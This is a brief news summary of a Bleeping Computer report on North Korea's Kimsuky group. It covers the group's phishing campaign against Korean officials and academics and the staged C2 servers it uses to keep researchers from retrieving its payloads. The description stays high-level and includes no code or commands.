"How 'Kimsuky' Hackers Ensure Their Malware Only Reach Valid Targets"

North Korean 'Kimsuky' threat actors are trying to ensure that their malicious payloads are only downloaded by legitimate targets and not by security researchers' systems. The threat group has been using new techniques to filter out invalid download requests since the beginning of 2022, when the group established a new campaign against various targets on the Korean peninsula. Kimsuky's new safeguards are so effective that there is an inability to acquire the final payloads even after successfully connecting to the threat actor's command-and-control (C2) server. The attacks detected by security researchers begin with a phishing email sent to North and South Korean politicians, diplomats, university professors, and journalists. Retrieved C2 scripts containing partial email addresses of targets allowed the researchers to compile a list of potential targets. The emails include a link that directs victims to a first-stage C2 server, which checks and verifies a few parameters before delivering a malicious document. If the visitor does not match any of the criteria, they are served an innocuous document. At the same time, as a subsequent checking parameter, the visitor's IP address is forwarded to the second-stage C2 server. The malicious macro in the document dropped by the first-stage C2 connects the victim to the second-stage C2, fetches the next-stage payload, and runs it with the mshta.exe process. Kimsuky is said to be a highly sophisticated threat actor who has recently been seen deploying custom malware and stealing emails from victims via Google Chrome extensions. This article continues to discuss Kimsuky's targets and latest infection process. 

Bleeping Computer reports "How 'Kimsuky' Hackers Ensure Their Malware Only Reach Valid Targets"